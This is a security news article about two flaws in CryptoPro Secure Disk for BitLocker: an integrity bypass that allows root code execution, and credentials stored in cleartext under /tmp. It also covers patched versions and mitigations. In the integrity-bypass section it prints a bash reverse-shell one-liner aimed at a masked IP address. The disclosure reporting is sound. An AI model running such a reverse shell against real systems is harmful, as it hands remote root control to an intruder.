Cyber Security News

Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft

Multiple vulnerabilities have been discovered in CryptoPro Secure Disk (CPSD) for BitLocker, a widely used encryption solution.

These flaws could allow an attacker with physical access to a device to gain persistent root access and steal sensitive credentials.

The issues identified by security researchers at SEC Consult Vulnerability Lab highlight significant risks for organizations that rely on this software for data protection.

CVECVSSDetails
CVE-2025-10010N/AIntegrity bypass enables root code execution.
N/AN/ACleartext /tmp data exposes credentials.

Integrity Validation Bypass

The first vulnerability, designated as CVE-2025-10010, involves an integrity validation bypass.

CryptoPro Secure Disk boots a minimal Linux operating system to authenticate users, then decrypts the Windows partition with BitLocker.

This Linux system resides on an unencrypted partition, accessible to anyone who can physically reach the hard drive or boot the system from an external medium.

While the system uses the Linux kernel’s Integrity Measurement Architecture (IMA) to verify files, researchers found that IMA does not validate certain configuration files.

bash -c ‘exec bash -i &>/dev/tcp/192.168.XXX.XXX/9999 <&1' &

By manipulating these files, an attacker can execute arbitrary code with root privileges. This could allow them to plant a backdoor and monitor or access data during execution without triggering any system errors.

ProductVulnerable VersionsFixed Versions
CPSD CryptoPro Secure Disk< 7.6.6 / < 7.7.17.6.6 / 7.7.1

ClearText Storage of Sensitive Data

The second issue concerns the storage of sensitive data in clear text. When users forget their credentials, CryptoPro Secure Disk offers an online support feature that connects to a predefined network.

According to SEC Consult, to facilitate this connection, the system stores necessary secrets, such as certificates and passwords, in cleartext within the temporary ‘/tmp’ folder.

If an attacker has already gained access to the Linux environment, perhaps through the first vulnerability, they can easily read these files.

Cleartext certificate credentials expose WLAN access and enable 802.1X bypass(source : sec-consult)

This information could then be used to access internal networks or bypass network access controls, further compromising the organization’s infrastructure.

The vendor, CPSD, was notified of these issues in June 2025 and has since provided patches. Versions 7.6.6 and 7.7.1 address the vulnerabilities.

Organizations using CryptoPro Secure Disk should update their software immediately. If updating is not immediately possible, the vendor recommends encrypting the PBA partition, a feature available since version 7.6.0.

Starting with version 7.7, this encryption is enabled by default, mitigating the risk of unauthorized file modifications.

SEC Consult also advises organizations to conduct thorough security reviews of their encryption solutions to identify and address any other potential weaknesses.

Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

Abinaya

Abi is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space.

Recent Posts

Hackers Target AI Infrastructure With RCE, Prompt Injection and API Key Theft

Hackers are actively probing AI systems, turning exposed gateways and agent tools into routes for…

4 hours ago

Hackers Make Phishing Pages Change Their Code Every Time Someone Opens Them

Hackers are making some phishing pages harder to track by changing the code delivered to…

4 hours ago

Iran-Linked Hackers Reportedly Knock UK Power Plant Offline for Four Days

A cyber incident reportedly forced a British power plant to halt operations for about four…

5 hours ago

Russian Hackers Use New HOOKEDGE Malware to Spy on European Defense and Diplomatic Targets

Russian hackers have used a new backdoor called HOOKEDGE to target defense manufacturers, government bodies,…

6 hours ago

Ransomware Gang Claims AI Can Analyze 700GB of Stolen Data Every Hour

TITAN ransomware is pairing file encryption with an ambitious claim: artificial intelligence that can sort…

6 hours ago

Hackers Compromise Hundreds of WordPress Sites to Deploy Amatera Stealer via ClickFix

A fake student resume is being used to place a remote-access tool on researchers’ Windows…

7 hours ago